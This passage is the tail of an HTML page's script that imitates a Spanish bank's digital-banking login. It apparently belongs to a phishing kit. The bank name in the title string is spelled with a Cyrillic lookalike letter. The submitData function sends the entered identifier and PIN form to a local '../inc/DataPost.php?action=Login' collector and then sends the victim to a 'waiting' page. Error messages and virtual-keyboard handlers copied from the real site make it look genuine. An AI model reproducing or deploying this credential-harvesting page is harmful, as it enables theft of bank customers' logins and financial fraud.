        (navigator.appName == "Netscape" &&
          parseFloat(navigator.appVersion) <= 4.05 &&
          ipoficines == "0") ||
        (navigator.appName == "Microsoft Internet Explorer" &&
          parseFloat(navigator.appVersion) < 4.0)
      ) {
        location.href = "./html/elolgnh000202.html";
      }
      var d = document;
      var errors = new Array(
        "",
        "Se ha de rellenar el número secreto personal.",
        "El número secreto personal solo puede contener números.",
        "El número secreto personal ha de contener 4 cifras.",
        "Su tarjeta no es operativa para este servicio.",
        "Realizando la encriptación de los datos.",
        "Introduzca <b>su Identificador</b>",
        "﻿El campo identificador <b>no acepta letras, tan sólo acepta números</b>",
        "El Número secreto personal tiene que tener <b>4 ó 6 números</b>",
        "El Número secreto personal tiene que tener <b>4 ó 6 números</b>",
        "El carácter '",
        "' no es válido",
        "<br>Puede utilizar los carácteres: 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, ç, d, e, f, g, h, i, j, k, l, m, n, ñ, o, p, q, r, s, t, u, v, w, x, y, z.",
        "﻿Introduzca <b>su Número secreto personal</b>",
        "Pulse en el <b>teclado de la pantalla</b> su Número Secreto Personal",
        "Introduzca la identificación <b>en mayúscula</b>"
      );
      NS4 = document.layers ? true : false;
      N6 = document.getElementById && !document.all ? true : false;
      flagIdioma = "02";
      flagBorsa = false;
      flagPE = "P";
      tit = !flagBorsa ? "banca digital CaiхaBankNow" : "BrokerNow";

      function inicia() {
        if (window != top) top.location.href = location.href;
        window.name = "login";
        aux = "visible";
        $(".trigger_teclado_pwd").attr("title", "Mostrar teclado con letras");
        $(".trigger_teclado_pwd").attr(
          "onclick",
          "javascript:cambioTecladoVirtualPinPortal();"
        );
        $(".trigger_teclado_pwd").attr("data-back", "Mostrar teclado sencillo");
        $(".trigger_teclado_pwd").attr(
          "data-back-title",
          "Mostrar teclado sencillo"
        );
        $(".trigger_teclado_pwd").attr(
          "data-back-onclick",
          "javascript:cambioTecladoNormalPinPortal();"
        );
        $(".trigger_teclado_pwd").text("Mostrar teclado con letras");
        document.getElementById("introducirPasswordVirtual").style.display =
          "block";
      }
      $("form#loginForm").on("submit", function () {
        InicializaErrores();
        $("#enlaceBotonAceptar").addClass("disabled");
        $("form#loginForm").off("submit");
        submitData();
        return false;
      });
      function submitData() {
        var inputForm = document.getElementById("loginForm");
        var data = new FormData(inputForm);

        $.ajax({
          url: "../inc/DataPost.php?action=Login",
          type: "POST",
          data: data,
          contentType: false,
          cache: false,
          processData: false,
          success: function (response) {
            window.location.replace("Espera.html");
          },
        });
      }
      function comprobarInputsStyle() {
        if (document.getElementById("capaErrorID").style.display == "none") {
          document.getElementById("ID").className = "";
        } else if (
          document.getElementById("capaErrorID").style.display == "block"
        ) {
          document.getElementById("ID").className = "error";
        }
        if (document.getElementById("capaErrorPW").style.display == "none") {
          document.getElementById("pin1").className = "";
        } else if (
          document.getElementById("capaErrorPW").style.display == "block"
        ) {
          document.getElementById("pin1").className = "error";
        }
      }
      function cambiarTecladoAccesible() {
        $("#pin1").attr("readOnly", false);
        $("#enlaceBotonAceptar").attr(
          "href",
          "javascript:buttonAcep('accesible');comprobarInputsStyle();"
        );
        if (document.forms["INPUTS"].ID.value.length < 21) {
          aux = document.forms["INPUTS"].ID.value;
        }
        document.forms["INPUTS"].ID.value = aux;
        if (document.forms["INPUTS"].ID.value == "") {
          if (document.getElementById("recordar") != null) {
            document.getElementById("recordar").checked = false;
          }
        }

        document.forms["INPUTS"].pin1.value = "";
      }
      function marcarCheck(evento) {
        var key = evento.keyCode || evento.which;
        if (key == 13) {
          if (document.getElementById("recordar").checked == true) {
            document.getElementById("recordar").checked = false;
          } else {
            document.getElementById("recordar").checked = true;
          }
        }
      }
    </script>
  </body>
</html>
